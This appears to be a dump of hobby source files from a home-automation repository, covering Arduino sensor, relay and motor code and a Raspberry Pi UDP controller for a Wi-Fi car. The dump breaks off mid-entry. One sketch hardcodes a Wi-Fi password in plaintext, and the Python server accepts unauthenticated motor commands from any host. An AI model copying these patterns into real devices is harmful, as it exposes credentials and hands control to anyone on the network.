"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"Relay.h\"\n\n/****************************************************************************/\nRelay::Relay(uint8_t __pin, uint8_t __on_lvl):\n _pin(__pin), _on_lvl(__on_lvl)\n{\n}\n\nvoid Relay::begin(uint8_t default_lvl)\n{\n pinMode(_pin, OUTPUT);\n digitalWrite(_pin, default_lvl);\n _cur_lvl = default_lvl;\n}\n\nvoid Relay::on(void)\n{\n digitalWrite(_pin, _on_lvl);\n _cur_lvl = _on_lvl;\n}\n\nvoid Relay::off(void)\n{\n digitalWrite(_pin, !_on_lvl);\n _cur_lvl = !_on_lvl;\n}\n\nuint8_t Relay::cur_lvl(void)\n{\n return _cur_lvl;\n}\n\nvoid Relay::on_lvl(uint8_t __on_lvl)\n{\n _on_lvl = __on_lvl;\n}\nuint8_t Relay::on_lvl(void)\n{\n return _on_lvl;\n}\n\nuint8_t Relay::pin(void)\n{\n return _pin;\n}\n"
},
{
"alpha_fraction": 0.6211538314819336,
"alphanum_fraction": 0.6461538672447205,
"avg_line_length": 21.521739959716797,
"blob_id": "552d0d3334eb8566bac0f96173d10eab52152316",
"content_id": "3a1f67d9cf495c05e1d60f3c04cd6c61713608fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 520,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 23,
"path": "/ArduinoController/TemperatureSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n \n Connection:\n # DS18B20\n GND -> GND\n VDD -> 5V\n DQ -> 4.7 kOhm -> 5V\n */\n\n#ifndef __TEMPERATURESENSOR_H__\n#define __TEMPERATURESENSOR_H__\n\n#include <Arduino.h>\n#include <OneWire.h>\n\nfloat get_temperature(OneWire* ds_p);\n\n#endif // __TEMPERATURESENSOR_H__\n\n\n"
},
{
"alpha_fraction": 0.653030276298523,
"alphanum_fraction": 0.6621212363243103,
"avg_line_length": 18.352941513061523,
"blob_id": "46df8848e60fc91ac7dd79a2a171ec0bb619a5f8",
"content_id": "9c31814adebf626e54cc0b1d1cd9ce9276b293c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 34,
"path": "/lib/LightSensor/LightSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n \n Connection:\n VCC -> 5V\n GND -> GND\n DO -> any digital INPUT pin\n */\n\n#ifndef __LIGHTSENSOR_H__\n#define __LIGHTSENSOR_H__\n\n#define LIGHTSENSOR_LIGHT LOW\n#define LIGHTSENSOR_DARK HIGH\n\n#include <Arduino.h>\n\nclass LightSensor\n{\nprivate:\n unsigned int _pin;\n\npublic:\n LightSensor(unsigned int __pin);\n unsigned int pin(void);\n void begin(void);\n bool get(void);\n};\n\n#endif // __LIGHTSENSOR_H__\n\n\n"
},
{
"alpha_fraction": 0.6725228428840637,
"alphanum_fraction": 0.676036536693573,
"avg_line_length": 25.830188751220703,
"blob_id": "e7840319dbaa570e61fdf386b7c7909f72324ad4",
"content_id": "a52d07753480ab77331a86dd12f04eaaa6a4c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1423,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 53,
"path": "/elSkateboard/Logger.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#ifndef __LOGGER_H__\n#define __LOGGER_H__\n\n#include <Arduino.h>\n#include <FileIO.h>\n\n#define LOGGER_BUFFER_LEN_BITS 3\n#define LOGGER_BUFFER_LENGTH (1 << LOGGER_BUFFER_LEN_BITS)\n#define LOGGER_BUFFER_INDEX_MASK ((1 << LOGGER_BUFFER_LEN_BITS) - 1)\n#define LOGGER_DEFAULT_FILE_NAME \"/mnt/sda1/logs/ArduinoLogs.txt\"\n\nenum LogType {\n EMPTY,\n VOLTAGE_OVERALL, // overall system voltage, measured directly from battery\n CURRENT_OVERALL // overall system current, measured directly from battery\n};\n\nstruct LogS {\n long timeMs; // in millisecond\n byte type; // refer to defined types below\n float value; // refer to defined types below\n};\n\nclass Logger {\n private:\n String fileName;\n LogS logs[LOGGER_BUFFER_LENGTH];\n volatile byte entryNum;\n volatile byte writeIndex;\n volatile byte readIndex;\n public:\n Logger(String _fileName=LOGGER_DEFAULT_FILE_NAME);\n\n /*\n * Remove log file if it exist.\n */\n void clearFile();\n\n /*\n * Write log entry in memory, ideal to call from ISR.\n */\n void writeToMem(long timeMs, byte type, float value);\n\n /*\n * Write available log entries to file. This should not be called from an ISR,\n * instead it should be called from loop() method.\n * This can be called every loop() since nothing will be done if there's no\n * available log entry to write to file system.\n */\n void writeToFile();\n};\n\n#endif // __LOGGER_H__\n"
},
{
"alpha_fraction": 0.5749250650405884,
"alphanum_fraction": 0.6383616328239441,
"avg_line_length": 26.77777862548828,
"blob_id": "094f60bfec5f9509ad287c9d42fc5fdea5aac39e",
"content_id": "5e53c429aca3a06142712c2c2d7eee5ef2e09895",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2002,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 72,
"path": "/elSkateboard/elSkateboard.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include \"TimerOne.h\"\n#include \"VoltageSensor.h\"\n#include \"CurrentSensor.h\"\n#include \"Logger.h\"\n\n// Debug flags\n#define ENABLE_DEBUG // enable this line if get debug print\n#define DEBUG_CONSOLE // enable this line if Yun shield is used\n#ifdef ENABLE_DEBUG\n #ifdef DEBUG_CONSOLE\n #include <Console.h>\n #define DDD Console\n #else\n #define DDD Serial\n #endif // DEBUG_CONSOLE\n#endif // ENABLE_DEBUG\n\n/*\n * Timer based interrupt\n * with 32ms as period, we can achieve following timer period by:\n * if ((++timerCount) & 0x1 == 0): every 32ms * 2 = 64ms\n * if ((++timerCount) & 0x3 == 0): every 32ms * 4 = 128ms\n * if ((++timerCount) & 0x7 == 0): every 32ms * 8 = 256ms\n * if ((++timerCount) & 0x15 == 0): every 32ms * 16 = 512ms = 0.512s\n * if ((++timerCount) & 0x31 == 0): every 32ms * 32 = 1024ms = 1.024s\n * if ((++timerCount) & 0x63 == 0): every 32ms * 64 = 2048ms = 2.048s\n * if ((++timerCount) & 0x127 == 0): every 32ms * 128 = 4096ms = 4.096s\n * if (++timerCount == 0): every 32ms * 256 = 8192ms = 8.192s\n */\n#define TIMER_PERIOD 32 // timer pops up every 32 ms\nvolatile byte timerCount = 0;\nvolatile boolean flagReadVoltage = false;\nvolatile boolean flagReadCurrent = false;\n\n// voltage sensor on analog pin 0\nVoltageSensor volt(0);\n// current sensor on analog pin 1\nCurrentSensor amp(1);\nLogger logger;\n\nvoid setup() {\n Timer1.initialize(TIMER_PERIOD * 1000);\n Timer1.attachInterrupt(timerIsr);\n #ifdef ENABLE_DEBUG\n #ifdef DEBUG_CONSOLE\n Bridge.begin();\n DDD.begin();\n #else\n DDD.begin(9600);\n #endif\n #endif\n\n #ifdef BRIDGE_H_ // Bridge is used\n Bridge.begin();\n #endif\n #ifdef __FILEIO_H__ // FileIO is used\n FileSystem.begin();\n #endif\n}\n\nvoid loop() {\n logger.writeToFile();\n}\n\nvoid timerIsr() {\n if (++timerCount == 0) {\n // log VOLTAGE_OVERALL\n logger.writeToMem(millis(), VOLTAGE_OVERALL, volt.read());\n // log CURRENT_OVERALL\n logger.writeToMem(millis(), CURRENT_OVERALL, amp.read());\n }\n}\n\n\n"
},
{
"alpha_fraction": 0.5075311064720154,
"alphanum_fraction": 0.5776031613349915,
"avg_line_length": 19.917808532714844,
"blob_id": "7d703d571944ae98aaeea5c428115a91fdea8c48",
"content_id": "efdbd7f078a89bfc547b2c55abd6e99712e9985e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 73,
"path": "/ArduinoNano/ArduinoNano.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include <SoftwareSerial.h>\n\n#define SSID \"michael\" // insert your SSID\n#define PASS \"waterpigs\" // insert your password\n#define DST_IP \"192.168.31.107\" //RaspberryPi\n\nSoftwareSerial esp8266(10, 11); // RX, TX\n\nvoid setup()\n{\n Serial.begin(9600);\n esp8266.begin(9600);\n sendDebug(\"AT+RST\"); // reset\n delay(2000);\n sendDebug(\"AT\");\n sendDebug(\"ATE0\"); // disable echo\n connectWiFi();\n sendDebug(\"AT+CIPSTATUS\");\n \n sendDebug(\"AT+CIPSTART=\\\"UDP\\\",\\\"192.168.31.107\\\",9999\");\n}\n\nvoid loop()\n{\n //char cmd[30] = \"Kitchen;Temperature;-1900\";\n String data = \"Kitchen;Temperature;-1900\";\n String cmd = \"AT+CIPSEND=\";\n cmd += data.length();\n esp8266.println(cmd);\n Serial.println(cmd);\n if (esp8266.find(\">\")) {\n Serial.print(\">\");\n esp8266.print(data);\n Serial.println(data);\n } else {\n sendDebug(\"AT+CIPCLOSE\");\n }\n delay(2000);\n}\n\nvoid sendDebug(String cmd){\n esp8266.println(cmd);\n Serial.println(cmd);\n delay(1000);\n char tmp;\n tmp = esp8266.read();\n Serial.print(\">\");\n while (tmp != -1) {\n Serial.print(tmp);\n tmp = esp8266.read();\n }\n Serial.print(\"\\n\");\n} \n\nboolean connectWiFi()\n{\n sendDebug(\"AT+CWMODE=1\");\n delay(2000);\n String cmd=\"AT+CWJAP=\\\"\";\n cmd+=SSID;\n cmd+=\"\\\",\\\"\";\n cmd+=PASS;\n cmd+=\"\\\"\";\n sendDebug(cmd);\n delay(5000);\n if(esp8266.find(\"OK\")){\n Serial.println(\"RECEIVED: OK\");\n return true;\n }else{\n Serial.println(\"RECEIVED: Error\");\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.48148149251937866,
"alphanum_fraction": 0.48148149251937866,
"avg_line_length": 27,
"blob_id": "82acec8e216101236006bd82b43c6b6c38e6a58d",
"content_id": "f163ffa7f7983a83daee71976e4b9e4e9451389a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/WifiCar/SerialProtocol/__init__.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "__all__ = ['protocol.py', ]"
},
{
"alpha_fraction": 0.5397219657897949,
"alphanum_fraction": 0.5412115454673767,
"avg_line_length": 33.72413635253906,
"blob_id": "9eab1153a444c34ef675c0cc27f90d7b4fdc90d8",
"content_id": "682f9ce05f7f52a943ef142c7cd8d0d3ab420582",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4028,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 116,
"path": "/WifiCar/protocol.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"protocol.h\"\n\n/****************************************************************************/\nvoid send(String a_str) {\n Serial.println(a_str);\n}\n\nCommand::Command(String __str):\n _str(__str), error(\"\")\n{\n int first_separator_index, second_separator_index, end_mark_index;\n String temp_str;\n is_ok = true;\n//send( DebugMsg(\"Command::Command _str=\" + _str).to_s() );\n if (!_str.startsWith(TYPE_COMMAND)) {\n is_ok = false;\n error = _str + \" is not a COMMAND\";\n }\n if (is_ok) { // find the first separator\n first_separator_index = _str.indexOf(SEPARATOR); // it should always be \"CMD:xxxxx\"\n//send( DebugMsg(\"Command::Command first_separator_index=\" + first_separator_index).to_s() );\n if (first_separator_index == -1) {\n // no SEPARATOR found, this is wrong\n is_ok = false;\n error = _str + \" is missing separator\";\n }\n }\n if (is_ok) { // find the end mark\n end_mark_index = _str.indexOf(END_MARK);\n//send( DebugMsg(\"Command::Command end_mark_index=\" + end_mark_index).to_s() );\n if (end_mark_index == -1) {\n // no end mark is found\n is_ok = false;\n error = _str + \" is missing end mark\";\n }\n }\n if (is_ok && end_mark_index <= first_separator_index) {\n // end mark is before the first separator, wrong\n is_ok = false;\n error = _str + \" has end mark before the first separator\";\n }\n if (is_ok) { // find the second separator\n second_separator_index = _str.indexOf(SEPARATOR, first_separator_index + 1);\n//send( DebugMsg(\"Command::Command second_separator_index=\" + second_separator_index).to_s() );\n if (second_separator_index == -1) {\n // not found, then there is only one separator\n second_separator_index = end_mark_index;\n }\n//send( DebugMsg(\"Command::Command end_mark_index=\" + end_mark_index).to_s() );\n//send( DebugMsg(\"Command::Command second_separator_index=\" + second_separator_index).to_s() );\n // get <operation> field\n temp_str = _str.substring(first_separator_index+1, second_separator_index);\n//send( DebugMsg(\"Command::Command temp_str=\" + temp_str).to_s() );\n if (temp_str.length() == 0) {\n // <operation> field is empty\n is_ok = false;\n error = _str + \" has an empty operation field\";\n }\n }\n//send( DebugMsg(\"Command::Command error=\" + error).to_s() );\n if (is_ok) { // decide op_code\n op_str = temp_str;\n//send( DebugMsg(\"Command::Command op_str=\" + op_str).to_s() );\n if (op_str == \"TEMPER\") {\n op_code = OP_CODE_TEMPERATURE;\n } else if (op_str == \"ECHO\") {\n op_code = OP_CODE_ECHO;\n } else if (op_str == \"FORWARD\") {\n op_code = OP_CODE_MOTOR_FORWARD;\n } else if (op_str == \"BACKWARD\") {\n op_code = OP_CODE_MOTOR_BACKWARD;\n } else if (op_str == \"STOP\") {\n op_code = OP_CODE_MOTOR_STOP;\n } else if (op_str == \"SPEEDUP\") {\n op_code = OP_CODE_MOTOR_SPEEDUP;\n } else if (op_str == \"SPEEDDOWN\") {\n op_code = OP_CODE_MOTOR_SPEEDDOWN;\n } else if (op_str == \"TURNLEFT\") {\n op_code = OP_CODE_MOTOR_TURNLEFT;\n } else if (op_str == \"TURNRIGHT\") {\n op_code = OP_CODE_MOTOR_TURNRIGHT;\n } else {\n op_code = OP_CODE_UNKNOWN;\n }\n }\n}\n\nString Command::echo() {\n return Response(STATUS_OK, op_str).to_s();\n}\n\nResponse::Response(int _status, String _msg):\n status(_status), msg(_msg)\n{\n}\n\nString Response::to_s() {\n String status_str;\n switch (status) {\n case STATUS_OK: status_str = \"OK\"; break;\n case STATUS_UNSUPPORTED: status_str = \"NOT_SUPPORTED\"; break;\n default: status_str = String(\"NOK:\");\n }\n return String(\"RSP:\") + status_str + \":\" + msg + \";\";\n}\n\nDebugMsg::DebugMsg(String __str):\n _str(__str)\n{\n}\n\nString DebugMsg::to_s() {\n return String(\"DEB:\") + _str + \";\";\n}\n"
},
{
"alpha_fraction": 0.6588366627693176,
"alphanum_fraction": 0.68232661485672,
"avg_line_length": 27.838708877563477,
"blob_id": "39637c5af03c48fc8b0934d5155b82c14e93b2d6",
"content_id": "42ad8b1597272efd726974138e06830004a76f55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 31,
"path": "/WifiCar/PiPin.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Define a digital pin connection with Raspberry Pi.\n*/\n\n#ifndef __PIPIN_H__\n#define __PIPIN_H__\n\n#include <Arduino.h>\n#include \"protocol.h\"\n\nconst byte PIPIN_OP_CODE_MOTOR_STOP = 0x0;\nconst byte PIPIN_OP_CODE_MOTOR_FORWARD = 0x1;\nconst byte PIPIN_OP_CODE_MOTOR_BACKWARD = 0x2;\nconst byte PIPIN_OP_CODE_MOTOR_TURNLEFT = 0x3;\nconst byte PIPIN_OP_CODE_MOTOR_TURNRIGHT = 0x4;\nconst byte PIPIN_OP_CODE_MOTOR_SPEEDUP = 0x5;\nconst byte PIPIN_OP_CODE_MOTOR_SPEEDDOWN = 0x6;\nconst int PIPIN_TO_PROTOCOL_OP_CODES[8] = {OP_CODE_MOTOR_STOP, OP_CODE_MOTOR_FORWARD, OP_CODE_MOTOR_BACKWARD, OP_CODE_MOTOR_TURNLEFT, OP_CODE_MOTOR_TURNRIGHT, OP_CODE_MOTOR_SPEEDUP, OP_CODE_MOTOR_SPEEDDOWN, OP_CODE_UNKNOWN};\n\nclass PiPin\n{\nprivate:\n int in0, in1, in2;\n\npublic:\n PiPin(int _in0, int _in1, int _in2);\n void init(void);\n int read(void);\n};\n\n#endif // __PIPIN_H__\n"
},
{
"alpha_fraction": 0.515999972820282,
"alphanum_fraction": 0.5440000295639038,
"avg_line_length": 26.77777862548828,
"blob_id": "b4b14b5f8c6ce5282a70068d03b810935942bc0c",
"content_id": "f7f4573b4a0319a51ccc43d8f9dc38aa9adc5950",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/WifiCar/echoSerial/echoSerial.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport serial\n\nif __name__ == '__main__':\n ser = serial.Serial('/dev/ttyUSB0', 19200)\n while True:\n x = input('--> ')\n ser.write(bytes(x.encode('ascii')))\n print('Nano: ', ser.readline().decode('ascii'))\n"
},
{
"alpha_fraction": 0.5562182664871216,
"alphanum_fraction": 0.566821277141571,
"avg_line_length": 34.92856979370117,
"blob_id": "21d0a8c70ce9097a7382370699d575fa8d2eb30f",
"content_id": "c11fe82069985fedd2cef998e132cbae0eb151ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4527,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 126,
"path": "/WifiCar/WifiCar.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport logging\nimport argparse\nimport os\nimport socketserver\nfrom time import sleep\nfrom SerialProtocol.protocol import RxCmd, NotRxCmdException\nimport RPi.GPIO as gpio\n\n\"\"\"\nclass Connection:\n TYPES = (SERIAL, ) = range(1)\n def __init__(self, conn_type=SERIAL):\n self.conn_type = conn_type\n if conn_type == Connection.SERIAL:\n if 'windows' in ' '.join(os.uname()).lower():\n self.conn = serial.Serial(port=4, baudrate=19200)\n else:\n self.conn = serial.Serial('/dev/ttyACM0', 19200)\n def send(self, a_str):\n if self.conn_type == Connection.SERIAL:\n self.conn.write(bytes(a_str.encode('ascii')))\n logging.debug(\"Pi->Uno: {}\".format(a_str))\n self.conn.flush()\n def read_char(self):\n c = self.conn.read()\n decoded = False\n while not decoded:\n try:\n c = c.decode('ascii')\n decoded = True\n except UnicodeDecodeError:\n c = self.conn.read()\n return c\n def receive(self):\n line = self.conn.readline()\n decoded = False\n while not decoded:\n try:\n line = line.decode('ascii')\n decoded = True\n except UnicodeDecodeError:\n line = line[1:]\n logging.debug(\"Uno->Pi: {}\".format(line))\n return line\n def readlines(self):\n temp = \"\"\n lines = tuple()\n if self.conn_type == Connection.SERIAL:\n while self.conn.inWaiting() > 0:\n temp += self.conn.read(1)\n decoded_str = \"\"\n for c in temp:\n try:\n decoded_str += c.decode('ascii')\n except UnicodeDecodeError:\n pass\n lines = tuple(decoded_str.split('\\n'))\n for line in lines:\n logging.debug(\"Uno->Pi: {}\".format(line))\n return lines\n\"\"\"\n\nclass PiPin:\n def __init__(self, out_pins):\n '''\n out_pins: a list of GPIO pins for output command.\n\n Note that the pin numbering is the board numbering starting from 1.\n '''\n assert isinstance(out_pins, tuple) or isinstance(out_pins. list)\n assert len(out_pins) == 3\n for pin in out_pins:\n assert isinstance(pin, int)\n assert 0 < pin <= 40\n self.out_pins = out_pins\n gpio.setmode(gpio.BOARD)\n for pin in self.out_pins:\n gpio.setup(pin, gpio.OUT)\n gpio.output(pin, False)\n def write(self, value):\n for i in range(len(self.out_pins)):\n gpio.output(self.out_pins[i], value & (1 << i))\n\nHOST = \"0.0.0.0\"\nPORT = 9999\nENCODING = \"ASCII\"\ncount = 0\nclass RaspberryPiHandler(socketserver.BaseRequestHandler):\n \"\"\"\n Handles one incoming datagram.\n \"\"\"\n pipin = PiPin((37, 38, 40))\n action_list = ('STOP', 'FORWARD', 'BACKWARD', 'LEFT', 'RIGHT', 'SPEEDUP', 'SPEEDDOWN')\n def handle(self):\n logging.info(\"On socket({}) received \\\"{}\\\"\".format(self.request[1], self.request[0]))\n logging.debug(\"type(self.request[0])={}\".format(type(self.request[0])))\n datagram = self.request[0].decode(encoding=ENCODING)\n try:\n rx_cmd = RxCmd(datagram)\n except NotRxCmdException:\n logging.warn(\"Received illegal RxCmd: {}\".format(datagram))\n return\n is_done = False\n for i in range(len(RaspberryPiHandler.action_list)):\n if rx_cmd.cmd == RaspberryPiHandler.action_list[i]:\n logging.debug(\"Do {}\".format(rx_cmd.cmd))\n RaspberryPiHandler.pipin.write(i)\n is_done = True\n if not is_done:\n logging.warn(\"Operation unknown: {}\".format(rx_cmd.cmd))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbosity\", help=\"verbosity of logging output [0..4]\", action=\"count\", default=0)\n args = parser.parse_args()\n if args.verbosity > 4:\n args.verbosity = 4\n log_lvl = (logging.CRITICAL, logging.ERROR, logging.WARNING, logging.INFO, logging.DEBUG)[args.verbosity]\n logging.basicConfig(level=log_lvl, format='%(filename)s:%(levelname)s:%(message)s')\n logging.info(\"Starting UdpServer instance...\")\n server = socketserver.UDPServer((HOST, PORT), RaspberryPiHandler)\n logging.info(\"UdpServer instance started.\")\n logging.info(\"Let UdpServer to serve forever ...\")\n server.serve_forever()\n"
},
{
"alpha_fraction": 0.6973180174827576,
"alphanum_fraction": 0.6973180174827576,
"avg_line_length": 17.64285659790039,
"blob_id": "d2745b080e1325aee5e53679fc01f5bc77843d2e",
"content_id": "7781f4f3b83b1d5bf651298da072ebc1442a77c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 14,
"path": "/elSkateboard/VoltageSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __VOLTAGE_SENSOR_CPP__\n#define __VOLTAGE_SENSOR_CPP__\n\n#include \"VoltageSensor.h\"\n\nVoltageSensor::VoltageSensor(int _pin):\n pin(_pin){\n}\n\nfloat VoltageSensor::read() {\n return analogRead(pin) * VOLTAGE_RESOLUTION;\n}\n\n#endif // __VOLTAGE_SENSOR_CPP__\n"
},
{
"alpha_fraction": 0.47999998927116394,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 24,
"blob_id": "c8495a45fcbb6f479aeeb40c68534c5bbaa5fd76",
"content_id": "3df4fc494f29dc2631949c3ea8da57808e556358",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 25,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 1,
"path": "/lib/WebIOPi/README.txt",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "Downloaded on 2014-12-08\n"
},
{
"alpha_fraction": 0.5041041970252991,
"alphanum_fraction": 0.5235546231269836,
"avg_line_length": 33.592594146728516,
"blob_id": "472955aeef3fb834fc38204bf9236c6c209b2e8f",
"content_id": "bd6d081fbe9ca8a3a915f71a7d2a81a9c3fe720e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5604,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 162,
"path": "/WifiCar/WifiCar.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nNeeded components:\n - Arduino Uno (x1)\n - Raspberry Pi (x1)\n - USB power bank (x1)\n - 1.5V AA (x8)\n - 1.5V AA battery shell (holding 4) (x2)\n - step motor (x4)\n - RC car framework (x1)\n - L298N (H-bridge) (x1)\n - InfraRed obstacle sensor (x2)\nConnections:\n - Pi.USB <-> Uno.USB\n*/\n#include \"protocol.h\"\n#include \"PiPin.h\"\n#include \"Motor.h\"\n\n//#define ENABLE_DEBUG\n#include \"debug.h\"\n\nconst char NEW_LINE = 0;\nconst int SERIAL_BAUDRATE = 19200;\n\n/* Uno <-> Pi GPIO connection:\n PIN_A3 <-> Pi_37 (GPIO_26) ## bit 0\n PIN_A4 <-> Pi_38 (GPIO_20) ## bit 1\n PIN_A5 <-> Pi_40 (GPIO_21) ## bit 2\n*/\nPiPin pipin(3, 4, 5);\n\n/* L298N connection:\n enA -> PIN_D10\n in1 -> PIN_D9\n in2 -> PIN_D8\n enB -> PIN_D5\n in3 -> PIN_D7\n in4 -> PIN_D6\n*/\nMotor motor(10, 9, 8, 5, 7, 6);\n\n/* InfraRed obstacle sensor (left) connections:\n VCC <-> 5V\n GND <-> GND\n Out <-> PIN_A0\n\n InfraRed obstacle sensor (left) connections:\n VCC <-> 5V\n GND <-> GND\n Out <-> PIN_A1\n*/\nconst int LEFT_OBS_PIN = 0;\nconst int RIGHT_OBS_PIN = 1;\n\n// internal status for checking obstacles\nconst byte _STATUS_OBS_NONE = 0x0;\nconst byte _STATUS_OBS_LEFT = 0x1;\nconst byte _STATUS_OBS_RIGHT = 0x2;\nconst byte _STATUS_OBS_FRONT = 0x4;\nconst unsigned long FRONT_DIST_THRESHOLD = 200; // try to avoid front crash when obstacle is 200 mm away\nconst int MANOEUVRE_TIME = 400; // ms\n\nvoid setup() {\n Serial.begin(SERIAL_BAUDRATE);\n motor.init();\n pipin.init();\n randomSeed(analogRead(5));\n}\n\nvoid loop() {\n int op_code, motor_status;\n byte obs_status = _STATUS_OBS_NONE;\n op_code = pipin.read();\n switch (op_code) {\n case OP_CODE_MOTOR_FORWARD:\n case OP_CODE_MOTOR_BACKWARD:\n case OP_CODE_MOTOR_STOP:\n case OP_CODE_MOTOR_SPEEDUP:\n case OP_CODE_MOTOR_SPEEDDOWN:\n case OP_CODE_MOTOR_TURNLEFT:\n case OP_CODE_MOTOR_TURNRIGHT: motor.execute(op_code); break;\n case OP_CODE_ECHO: dbg_print(\"ECHO\"); break;\n default: dbg_print(Response(STATUS_UNSUPPORTED, \"\").to_s());\n }\n // manoeuvre to avoid front crash\n motor_status = motor.status;\n obs_status |= !(analogRead(LEFT_OBS_PIN) > 512) ? true: false;\n obs_status |= (!(analogRead(RIGHT_OBS_PIN) > 512) ? true: false) << 1;\n obs_status |= ((obs_status&0x1) | ((obs_status>>1)&0x1)) << 2;\n dbg_print(obs_status);\n switch (obs_status) {\n case _STATUS_OBS_LEFT | _STATUS_OBS_RIGHT | _STATUS_OBS_FRONT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD:\n motor.backward(); delay(MANOEUVRE_TIME); motor.stop();\n if (random(0, 2) == 0) {\n motor.turnleft(); delay(MANOEUVRE_TIME*2); motor.stop();\n } else {\n motor.turnright(); delay(MANOEUVRE_TIME*2); motor.stop();\n }\n motor.forward(); break;\n case MOTOR_STATUS_LEFT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnleft();\n break;\n case MOTOR_STATUS_RIGHT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnright();\n break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_LEFT | _STATUS_OBS_RIGHT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD: break;\n case MOTOR_STATUS_LEFT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnleft();\n break;\n case MOTOR_STATUS_RIGHT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnright();\n break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_LEFT | _STATUS_OBS_FRONT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD:\n motor.backward(); delay(MANOEUVRE_TIME); motor.stop();\n motor.turnright(); delay(MANOEUVRE_TIME*2); motor.stop();\n motor.forward(); break;\n case MOTOR_STATUS_LEFT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnleft();\n break;\n case MOTOR_STATUS_RIGHT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnright();\n break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_RIGHT | _STATUS_OBS_FRONT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD:\n motor.backward(); delay(MANOEUVRE_TIME); motor.stop();\n motor.turnleft(); delay(MANOEUVRE_TIME*2); motor.stop();\n motor.forward(); break;\n case MOTOR_STATUS_LEFT: break;\n case MOTOR_STATUS_RIGHT: break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_LEFT: break;\n case _STATUS_OBS_RIGHT: break;\n case _STATUS_OBS_FRONT: break;\n default: break;\n }\n}\n"
},
{
"alpha_fraction": 0.5958858728408813,
"alphanum_fraction": 0.617120087146759,
"avg_line_length": 33.272727966308594,
"blob_id": "1279cc0ca7420d0d2103c73edfa6683e10acccd9",
